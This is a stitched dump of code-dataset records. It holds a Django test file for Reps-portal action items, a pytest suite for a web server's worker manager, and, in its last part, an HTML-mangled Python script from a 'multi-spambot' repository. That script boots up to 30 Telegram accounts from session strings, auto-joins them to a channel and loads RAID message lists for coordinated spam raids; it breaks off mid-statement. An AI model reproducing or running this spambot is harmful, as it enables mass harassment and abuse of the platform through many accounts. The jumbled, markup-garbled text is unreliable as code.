        # Check that there is only one action item and it's resolved
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 1)
        eq_(items[0].resolved, True)
class EventActionItems(RemoTestCase):
    """Tests for action items asking event owners to input metrics."""
    def setUp(self):
        # NOTE(review): these activities are presumably required by the
        # event signal handlers / report creation — confirm against
        # remo.events; the tests below fail without them.
        ActivityFactory.create(name=ACTIVITY_EVENT_CREATE)
        ActivityFactory.create(name=ACTIVITY_EVENT_ATTEND)
    def test_post_event_metrics(self):
        """A past event gets one item after the notify task runs."""
        model = ContentType.objects.get_for_model(Event)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        # Event ended in the past, so metrics input is due.
        start = now() - timedelta(days=4)
        end = now() - timedelta(days=1)
        user = UserFactory.create(groups=['Rep'])
        event = EventFactory.create(owner=user, start=start, end=end)
        notify_event_owners_to_input_metrics()
        items = ActionItem.objects.filter(content_type=model, object_id=event.id)
        eq_(items.count(), 1)
    def test_resolve_post_event_metrics(self):
        """Submitting a metric outcome completes and resolves the item."""
        model = ContentType.objects.get_for_model(Event)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        start = now() - timedelta(days=4)
        end = now() - timedelta(days=1)
        user = UserFactory.create(groups=['Rep'])
        event = EventFactory.create(owner=user, start=start, end=end)
        notify_event_owners_to_input_metrics()
        items = ActionItem.objects.filter(content_type=model, object_id=event.id)
        eq_(items.count(), 1)
        # Creating the outcome is what should resolve the item.
        EventMetricOutcomeFactory.create(event=event)
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)
    def test_update_event_owner(self):
        """Changing the event owner re-targets the item to the new owner."""
        model = ContentType.objects.get_for_model(Event)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        start = now() - timedelta(days=4)
        end = now() - timedelta(days=1)
        user = UserFactory.create(groups=['Rep'])
        event = EventFactory.create(owner=user, start=start, end=end)
        notify_event_owners_to_input_metrics()
        items = ActionItem.objects.filter(content_type=model)
        eq_(items.count(), 1)
        new_owner = UserFactory.create(groups=['Rep'])
        event.owner = new_owner
        event.save()
        items = ActionItem.objects.filter(content_type=model, object_id=event.id)
        eq_(items.count(), 1)
        eq_(items[0].user, new_owner)
class ReportActionItems(RemoTestCase):
    """Tests for mentor-verification action items on NG reports."""
    def test_verify_activity(self):
        """A 'recruit mozillian' report opens an unresolved item for the mentor."""
        model = ContentType.objects.get_for_model(NGReport)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        activity = ActivityFactory.create(name=RECRUIT_MOZILLIAN)
        mentor = UserFactory.create()
        user = UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
        report = NGReportFactory.create(activity=activity, user=user,
                                        mentor=mentor)
        items = ActionItem.objects.filter(content_type=model,
                                          object_id=report.id,
                                          resolved=False)
        eq_(items.count(), 1)
    def test_resolve_verify_action_item(self):
        """Marking the report's activity verified completes/resolves the item."""
        model = ContentType.objects.get_for_model(NGReport)
        items = ActionItem.objects.filter(content_type=model)
        ok_(not items.exists())
        activity = ActivityFactory.create(name=RECRUIT_MOZILLIAN)
        mentor = UserFactory.create()
        user = UserFactory.create(groups=['Rep'], userprofile__mentor=mentor)
        report = NGReportFactory.create(activity=activity, user=user,
                                        mentor=mentor)
        items = ActionItem.objects.filter(content_type=model,
                                          object_id=report.id,
                                          resolved=False)
        eq_(items.count(), 1)
        # Verification is the event that should close the item.
        report.verified_activity = True
        report.save()
        for item in items:
            ok_(item.completed)
            ok_(item.resolved)
class ROTMActionItems(RemoTestCase):
    """Tests for Rep-of-the-month nomination action items."""

    @mock.patch('remo.profiles.tasks.now')
    def test_base(self, mocked_date):
        profile_type = ContentType.objects.get_for_model(UserProfile)
        ok_(not ActionItem.objects.filter(content_type=profile_type).exists())
        mentors = UserFactory.create_batch(2, groups=['Mentor'])
        # The reminder only fires on the first day of the month.
        mocked_date.return_value = datetime(now().year, now().month, 1)
        send_rotm_nomination_reminder()
        action_items = ActionItem.objects.filter(content_type=profile_type)
        eq_(action_items.count(), 2)
        expected_ids = {mentor.id for mentor in mentors}
        eq_(expected_ids,
            set(action_items.values_list('object_id', flat=True)))

    @mock.patch('remo.profiles.tasks.now')
    def test_invalid_date(self, mocked_date):
        profile_type = ContentType.objects.get_for_model(UserProfile)
        ok_(not ActionItem.objects.filter(content_type=profile_type).exists())
        UserFactory.create_batch(2, groups=['Mentor'])
        # Any day other than the 1st must not trigger the reminder.
        mocked_date.return_value = datetime(now().year, now().month, 2)
        send_rotm_nomination_reminder()
        ok_(not ActionItem.objects.filter(content_type=profile_type).exists())

    @mock.patch('remo.profiles.tasks.now')
    def test_resolve_action_item(self, mocked_date):
        profile_type = ContentType.objects.get_for_model(UserProfile)
        mentor = UserFactory.create(groups=['Mentor'])
        mocked_date.return_value = datetime(now().year, now().month, 1)
        ActionItem.create(mentor.userprofile)
        action_items = ActionItem.objects.filter(content_type=profile_type)
        eq_(action_items.count(), 1)
        eq_(action_items[0].resolved, False)
        # Resolution happens on day 10 of the month.
        mocked_date.return_value = datetime(now().year, now().month, 10)
        resolve_nomination_action_items()
        eq_(action_items.count(), 1)
        eq_(action_items[0].resolved, True)

    @mock.patch('remo.profiles.tasks.now')
    def test_resolve_action_item_invalid_date(self, mocked_date):
        profile_type = ContentType.objects.get_for_model(UserProfile)
        mentor = UserFactory.create(groups=['Mentor'])
        mocked_date.return_value = datetime(now().year, now().month, 1)
        ActionItem.create(mentor.userprofile)
        action_items = ActionItem.objects.filter(content_type=profile_type)
        eq_(action_items.count(), 1)
        eq_(action_items[0].resolved, False)
        # On day 11 the resolver must leave the item untouched.
        mocked_date.return_value = datetime(now().year, now().month, 11)
        resolve_nomination_action_items()
        eq_(action_items.count(), 1)
        eq_(action_items[0].resolved, False)
| 37.956364
| 98
| 0.652711
| 2,489
| 20,876
| 5.284452
| 0.075934
| 0.077549
| 0.072987
| 0.12347
| 0.817
| 0.792519
| 0.786361
| 0.783776
| 0.769178
| 0.760891
| 0
| 0.005259
| 0.234815
| 20,876
| 549
| 99
| 38.025501
| 0.818142
| 0.006563
| 0
| 0.703088
| 0
| 0
| 0.033185
| 0.004438
| 0
| 0
| 0
| 0
| 0
| 1
| 0.068884
| false
| 0
| 0.052257
| 0
| 0.133017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cf0c146eb352e3207d88b780068cc4abf4c7e27
| 4,562
|
py
|
Python
|
tests/test_manager.py
|
lilyinstarlight/python-fooster-web
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | 2
|
2018-07-17T17:38:42.000Z
|
2020-01-01T18:24:33.000Z
|
tests/test_manager.py
|
lilyinstarlight/python-fooster-web
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | 18
|
2016-06-07T15:12:00.000Z
|
2017-09-25T20:01:32.000Z
|
tests/test_manager.py
|
fkmclane/web.py
|
928b61b85d28ed119e07cc397f855ee914a82d6b
|
[
"MIT"
] | null | null | null |
import multiprocessing
import time
from fooster.web import web
import mock
import pytest
@pytest.mark.xfail
def test_manager_create():
    """The manager process spawns the configured number of workers."""
    ctx = multiprocessing.get_context(web.start_method)
    server = mock.MockHTTPServer(sync=ctx.Manager())
    server.manager_process = ctx.Process(target=web.HTTPServer.manager, args=(server,))
    server.manager_process.start()

    # give the manager a chance to poll at least once
    time.sleep(server.poll_interval + 1)

    try:
        assert server.manager_process.is_alive()
        assert server.cur_processes.value == server.num_processes
    finally:
        server.namespace.manager_shutdown = True
        server.manager_process.join(timeout=server.poll_interval + 1)
        server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_worker_death():
    """A worker that shuts down is replaced by the manager."""
    ctx = multiprocessing.get_context(web.start_method)
    server = mock.MockHTTPServer(sync=ctx.Manager())
    server.manager_process = ctx.Process(target=web.HTTPServer.manager, args=(server,))
    server.manager_process.start()

    # let the manager come up
    time.sleep(server.poll_interval + 1)

    try:
        initial = server.cur_processes.value
        assert initial == server.num_processes

        # ask worker 0 to shut down and give it time to die
        server.namespace.worker_shutdown = 0
        time.sleep(server.poll_interval + 1)
        server.namespace.worker_shutdown = None

        # give the manager time to respawn the worker
        time.sleep(server.poll_interval + 1)

        # the pool should be back at its initial size
        assert server.cur_processes.value == initial
    finally:
        server.namespace.manager_shutdown = True
        server.manager_process.join(timeout=server.poll_interval + 1)
        server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_manager_scaling():
    """The manager grows and shrinks the worker pool with request load."""
    ctx = multiprocessing.get_context(web.start_method)
    server = mock.MockHTTPServer(sync=ctx.Manager())
    server.manager_process = ctx.Process(target=web.HTTPServer.manager, args=(server,))
    server.manager_process.start()

    # let the manager come up
    time.sleep(server.poll_interval + 1)

    try:
        # saturate the request queue
        for _ in range(server.max_queue):
            with server.requests_lock:
                server.requests.value += 1

        # allow enough polls for the pool to grow
        time.sleep(server.poll_interval * server.max_processes + 1)

        # extra workers should have been spawned, but never past the cap
        count = server.cur_processes.value
        assert server.num_processes < count <= server.max_processes

        # finish a single request
        with server.requests_lock:
            server.requests.value -= 1

        # allow another round of polls
        time.sleep(server.poll_interval * server.max_processes + 1)

        # the pool must not shrink yet and must stay under the cap
        previous, count = count, server.cur_processes.value
        assert previous <= count <= server.max_processes

        # finish everything else
        with server.requests_lock:
            while server.requests.value > 0:
                server.requests.value -= 1

        # allow another round of polls
        time.sleep(server.poll_interval * server.max_processes + 1)

        # now the pool should shrink, but never below the baseline
        previous, count = count, server.cur_processes.value
        assert server.num_processes <= count < previous
    finally:
        server.namespace.manager_shutdown = True
        server.manager_process.join(timeout=server.poll_interval + 1)
        server.namespace.manager_shutdown = False
@pytest.mark.xfail
def test_manager_no_scale():
    """With no queue limit the manager keeps the baseline worker count."""
    ctx = multiprocessing.get_context(web.start_method)
    server = mock.MockHTTPServer(max_queue=None, sync=ctx.Manager())
    server.manager_process = ctx.Process(target=web.HTTPServer.manager, args=(server,))
    server.manager_process.start()

    # give the manager a chance to poll at least once
    time.sleep(server.poll_interval + 1)

    try:
        assert server.manager_process.is_alive()
        assert server.cur_processes.value == server.num_processes
    finally:
        server.namespace.manager_shutdown = True
        server.manager_process.join(timeout=server.poll_interval + 1)
        server.namespace.manager_shutdown = False
| 32.126761
| 129
| 0.701008
| 568
| 4,562
| 5.445423
| 0.169014
| 0.073715
| 0.090527
| 0.061429
| 0.881668
| 0.860653
| 0.817329
| 0.817329
| 0.799224
| 0.784352
| 0
| 0.005034
| 0.216133
| 4,562
| 141
| 130
| 32.35461
| 0.859899
| 0.094038
| 0
| 0.755814
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.046512
| false
| 0
| 0.05814
| 0
| 0.104651
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4cf5d4e8c698db8eef4111e1c5162f8d2459e67a
| 94,575
|
py
|
Python
|
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | null | null | null |
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | null | null | null |
Yash.py
|
Harpres/Harpreet-multi-spambot
|
83410723b8683b0eb111e65bd84d469d496a0dbc
|
[
"MIT"
] | 1
|
2022-03-27T10:04:20.000Z
|
2022-03-27T10:04:20.000Z
|
<div>import os<br/>import sys<br/>import random<br/>from datetime import datetime<br/>from os import execl<br/>from telethon import TelegramClient, events<br/>from telethon.sessions import StringSession<br/>from telethon.tl.functions.account import UpdateProfileRequest<div></div><br/>from telethon.errors import (<br/> ChannelInvalidError,<br/> ChannelPrivateError,<br/> ChannelPublicGroupNaError,<br/>)<br/>from telethon.tl import functions<br/>from telethon.tl.functions.channels import GetFullChannelRequest<br/>from telethon.tl.functions.messages import GetFullChatRequest<div></div><br/>from Config import STRING, SUDO, BIO_MESSAGE, ALIVE_NAME, API_ID, API_HASH, STRING2, STRING3, STRING4 ,STRING5, STRING6, STRING7, STRING8 ,STRING9, STRING10, STRING11, STRING12 , STRING13 , STRING14 , STRING15 ,STRING16 , STRING17 , STRING18 , STRING19 , STRING20 , STRING21 , STRING22 , STRING23 , STRING24 , STRING25 , STRING26 , STRING27 , STRING28 , STRING29 , STRING30<br/>import asyncio<br/>import telethon.utils<br/>from telethon.tl import functions<br/>from telethon.tl.functions.channels import LeaveChannelRequest<br/>from telethon.tl.functions.messages import ImportChatInviteRequest<br/>from Utils import RAID, RRAID<div></div><br/>a = API_ID<br/>b = API_HASH<br/>smex = STRING<br/>smexx = STRING2<br/>smexxx = STRING3<br/>smexxxx = STRING4<br/>smexxxxx = STRING5<br/>sixth = STRING6<br/>seven = STRING7<br/>eight = STRING8<br/>ninth = STRING9<br/>tenth = STRING10<br/>eleve = STRING11<br/>twelv = STRING12<br/>thirt = STRING13<br/>forte = STRING14<br/>fifth = STRING15<br/>sieee = STRING16<br/>seeee = STRING17<br/>eieee = STRING18<br/>nieee = STRING19<br/>gandu = STRING20<br/>ekish = STRING21<br/>baish = STRING22<br/>teish = STRING23<br/>tfour = STRING24<br/>tfive = STRING25<br/>tsix = STRING26<br/>tseven = STRING27<br/>teight = STRING28<br/>tnine = STRING29<br/>thirty = STRING30<div></div><div></div>idk = ""<br/>ydk = ""<br/>wdk = ""<br/>sdk = ""<br/>hdk = ""<br/>adk = ""<br/>bdk = 
""<br/>cdk = ""<br/>edk = ""<br/>ddk = ""<br/>vkk = ""<br/>kkk = ""<br/>lkk = ""<br/>mkk = ""<br/>sid = ""<br/>shy = ""<br/>aan = ""<br/>ake = ""<br/>eel = ""<br/>khu = ""<br/>shi = ""<br/>yaa = ""<br/>dav = ""<br/>raj = ""<br/>put = ""<br/>eag = ""<br/>gle = ""<br/>wal = ""<br/>aaa = ""<br/>boy = ""<div></div><div></div>que = {}<div></div>SMEX_USERS = []<br/>for x in SUDO: <br/> SMEX_USERS.append(x)<br/> <br/>async def start_yukki():<br/> global idk<br/> global ydk<br/> global wdk<br/> global sdk<br/> global hdk<br/> global adk<br/> global bdk<br/> global cdk<br/> global ddk<br/> global edk<br/> global vkk<br/> global kkk<br/> global lkk<br/> global mkk<br/> global sid<br/> global shy<br/> global aan<br/> global ake<br/> global eel<br/> global khu<br/> global shi<br/> global yaa<br/> global dav<br/> global raj<br/> global put<br/> global eag<br/> global gle<br/> global wal<br/> global aaa<br/> global boy<br/> if smex:<br/> session_name = str(smex)<br/> print("String 1 Found")<br/> idk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 1")<br/> await idk.start()<br/> botme = await idk.get_me()<br/> await idk(functions.channels.JoinChannelRequest(channel=""))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await idk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 1 not Found")<br/> session_name = "startup"<br/> idk = TelegramClient(session_name, a, b)<br/> try:<br/> await idk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if smexx:<br/> session_name = str(smexx)<br/> print("String 2 Found")<br/> ydk = TelegramClient(StringSession(session_name), a, 
b)<br/> try:<br/> print("Booting Up The Client 2")<br/> await ydk.start()<br/> await ydk(functions.channels.JoinChannelRequest(channel=""))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ydk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await ydk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 2 not Found")<br/> pass<br/> session_name = "startup"<br/> ydk = TelegramClient(session_name, a, b)<br/> try:<br/> await ydk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxx:<br/> session_name = str(smexxx)<br/> print("String 3 Found")<br/> wdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 3")<br/> await wdk.start()<br/> await wdk(functions.channels.JoinChannelRequest(channel=""))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await wdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await wdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 3 not Found")<br/> pass<br/> session_name = "startup"<br/> wdk = TelegramClient(session_name, a, b)<br/> try:<br/> await wdk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxxx:<br/> session_name = str(smexxxx)<br/> print("String 4 Found")<br/> hdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 4")<br/> await hdk.start()<br/> await 
hdk(functions.channels.JoinChannelRequest(channel=""))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> <br/> await hdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await hdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 4 not Found")<br/> pass<br/> session_name = "startup"<br/> hdk = TelegramClient(session_name, a, b)<br/> try:<br/> await hdk.start()<br/> except Exception as e:<br/> pass<div></div> if smexxxxx:<br/> session_name = str(smexxxxx)<br/> print("String 5 Found")<br/> sdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 5")<br/> await sdk.start()<br/> await sdk(functions.channels.JoinChannelRequest(channel=""))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await sdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 5 not Found")<br/> pass<br/> session_name = "startup"<br/> sdk = TelegramClient(session_name, a, b)<br/> try:<br/> await sdk.start()<br/> except Exception as e:<br/> pass<br/> <br/> if sixth:<br/> session_name = str(sixth)<br/> print("String 6 Found")<br/> adk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 6")<br/> await adk.start()<br/> await adk(functions.channels.JoinChannelRequest(channel=""))<br/> await 
adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await adk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await adk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 6 not Found")<br/> pass<br/> session_name = "startup"<br/> adk = TelegramClient(session_name, a, b)<br/> try:<br/> await adk.start()<br/> except Exception as e:<br/> pass<div></div> if seven:<br/> session_name = str(seven)<br/> print("String 7 Found")<br/> bdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 7")<br/> await bdk.start()<br/> await bdk(functions.channels.JoinChannelRequest(channel=""))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await bdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await bdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 7 not Found")<br/> pass<br/> session_name = "startup"<br/> bdk = TelegramClient(session_name, a, b)<br/> try:<br/> await bdk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if eight:<br/> session_name = str(eight)<br/> print("String 8 Found")<br/> cdk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 8")<br/> await cdk.start()<br/> await cdk(functions.channels.JoinChannelRequest(channel=""))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await 
cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await cdk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await cdk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 8 not Found")<br/> pass<br/> session_name = "startup"<br/> cdk = TelegramClient(session_name, a, b)<br/> try:<br/> await cdk.start()<br/> except Exception as e:<br/> pass <br/> <br/> if ninth:<br/> session_name = str(ninth)<br/> print("String 9 Found")<br/> ddk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 9")<br/> await ddk.start()<br/> await ddk(functions.channels.JoinChannelRequest(channel=""))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await ddk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await ddk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 9 not Found")<br/> pass<br/> session_name = "startup"<br/> ddk = TelegramClient(session_name, a, b)<br/> try:<br/> await ddk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if tenth:<br/> session_name = str(tenth)<br/> print("String 10 Found")<br/> edk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 10")<br/> await edk.start()<br/> await edk(functions.channels.JoinChannelRequest(channel=""))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await 
edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await edk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await edk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 10 not Found")<br/> pass<br/> session_name = "startup"<br/> edk = TelegramClient(session_name, a, b)<br/> try:<br/> await edk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if eleve:<br/> session_name = str(eleve)<br/> print("String 11 Found")<br/> vkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 11")<br/> await vkk.start()<br/> await vkk(functions.channels.JoinChannelRequest(channel=""))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await vkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await vkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 11 not Found")<br/> pass<br/> session_name = "startup"<br/> vkk = TelegramClient(session_name, a, b)<br/> try:<br/> await vkk.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/> if twelv:<br/> session_name = str(twelv)<br/> print("String 12 Found")<br/> kkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 12")<br/> await kkk.start()<br/> await kkk(functions.channels.JoinChannelRequest(channel=""))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> 
await kkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await kkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 12 not Found")<br/> pass<br/> session_name = "startup"<br/> kkk = TelegramClient(session_name, a, b)<br/> try:<br/> await kkk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if thirt:<br/> session_name = str(thirt)<br/> print("String 13 Found")<br/> lkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 13")<br/> await lkk.start()<br/> await lkk(functions.channels.JoinChannelRequest(channel=""))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await lkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await lkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 13 not Found")<br/> pass<br/> session_name = "startup"<br/> lkk = TelegramClient(session_name, a, b)<br/> try:<br/> await lkk.start()<br/> except Exception as e:<br/> pass <br/> <br/> <br/> if forte:<br/> session_name = str(forte)<br/> print("String 14 Found")<br/> mkk = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 14")<br/> await mkk.start()<br/> await mkk(functions.channels.JoinChannelRequest(channel=""))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await 
mkk(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await mkk.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 14 not Found")<br/> pass<br/> session_name = "startup"<br/> mkk = TelegramClient(session_name, a, b)<br/> try:<br/> await mkk.start()<br/> except Exception as e:<br/> pass<br/> <br/> <br/> if fifth:<br/> session_name = str(fifth)<br/> print("String 15 Found")<br/> sid = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 15")<br/> await sid.start()<br/> await sid(functions.channels.JoinChannelRequest(channel=""))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await sid(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> botme = await sid.get_me()<br/> botid = telethon.utils.get_peer_id(botme)<br/> SMEX_USERS.append(botid)<br/> except Exception as e:<br/> print(e)<br/> pass<br/> else:<br/> print("Session 15 not Found")<br/> pass<br/> session_name = "startup"<br/> sid = TelegramClient(session_name, a, b)<br/> try:<br/> await sid.start()<br/> except Exception as e:<br/> pass<div></div><br/> if sieee:<br/> session_name = str(sieee)<br/> print("String 16 Found")<br/> shy = TelegramClient(StringSession(session_name), a, b)<br/> try:<br/> print("Booting Up The Client 16")<br/> await shy.start()<br/> botme = await shy.get_me()<br/> await shy(functions.channels.JoinChannelRequest(channel=""))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await shy(functions.channels.JoinChannelRequest(channel="@ABOUT_HYPER"))<br/> await 
